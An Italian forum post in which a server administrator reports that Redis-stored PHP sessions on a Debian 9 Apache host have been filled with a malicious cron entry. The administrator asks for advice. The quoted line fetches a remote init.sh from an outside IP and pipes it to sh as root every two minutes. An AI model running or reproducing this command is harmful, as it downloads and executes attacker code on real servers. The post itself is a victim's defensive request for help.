ciao!

su un applicativo web scritto in php, su server debian con apache, uso redis per salvare le sessioni.
da qualche giorno mi trovo con sessioni di questo tipo:
codice:
*/2 * * * * root cd1 -fsSL http://39.100.33.209/b2f628/init.sh | sh
questo fa si che spesso non si riesca a fare il login.
inoltre non riesco a fare lo stop di redis.
sono costretto a killare il processo.-

ho già fatto una scansione con clamav, ma non ha rilevato nulla.

qualche info:
codice:
# lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 9.13 (stretch)
Release:        9.13
Codename:       stretch

# dglob php
php7.0-mysql
php-tcpdf
php-phpseclib
php7.0-readline
php-php-gettext
php-bz2
php7.0-opcache
php-soap
php7.0-mbstring
php7.0
libapache2-mod-php7.0
php-igbinary
php7.0-gd
php-curl
php7.0-mcrypt
php7.0-curl
php7.0-cli
php-zip
php-redis
php-xml
php7.0-odbc
php-cli
phpmyadmin
php7.0-zip
php-mbstring
php7.0-json
php-common
php-pear
php7.0-common
php-gd
php7.0-xml
php-mysql
php-gettext
php7.0-bz2
php7.0-soap
cosa posso fare secondo voi??